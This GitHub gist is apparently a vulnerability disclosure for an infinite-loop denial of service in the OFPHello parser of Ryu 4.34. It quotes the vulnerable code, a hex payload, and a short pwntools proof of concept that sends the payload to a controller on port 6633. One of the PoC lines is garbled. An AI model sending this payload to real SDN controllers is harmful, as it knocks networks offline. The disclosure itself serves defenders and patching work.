Skip to content

Instantly share code, notes, and snippets.

@ErodedElk
Created April 9, 2024 17:28
Show Gist options
  • Save ErodedElk/00082066a2a3638894089d6dcdaf7626 to your computer and use it in GitHub Desktop.
Save ErodedElk/00082066a2a3638894089d6dcdaf7626 to your computer and use it in GitHub Desktop.
An issue was discovered in OFPHello in parser.py in Faucet SDN Ryu version 4.34, allows remote attackers to cause a denial of service (DoS) (infinite loop).

in /ryu/ofproto/ofproto_v1_3_parser.py about line=139

class OFPHello(MsgBase):
...
    @classmethod
    def parser(cls, datapath, version, msg_type, msg_len, xid, buf):
        msg = super(OFPHello, cls).parser(datapath, version, msg_type,
                                          msg_len, xid, buf)

        offset = ofproto.OFP_HELLO_HEADER_SIZE
        elems = []
        while offset < msg.msg_len:
            type_, length = struct.unpack_from(
                ofproto.OFP_HELLO_ELEM_HEADER_PACK_STR, msg.buf, offset)
            ...
            offset += length
        msg.elements = elems
        return msg

If the variable length is equal to 0,the offset will no longer change and the parsing will fall into an infinite loop.

payload:

payload="04000010000000130001000000000010"
payload=bytes.fromhex(payload)

poc:

from pwn import *
p=remote("0.0.0.0",6633)
payload="04000010000000130001000000000010"
payload=bytes.fromhex(payload)p.send(payload)
p.send(payload)
p.interactive()

The Hello message is the first step in the handshake process, which means that all malicious traffic can put the controller into an infinite loop before establishing a connection with the controller.

This problem also occurs with the following code:

/ryu/ofproto/ofproto_v1_3_parser.py about line=139
/ryu/ofproto/ofproto_v1_4_parser.py about line=103
/ryu/ofproto/ofproto_v1_5_parser.py about line=104
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment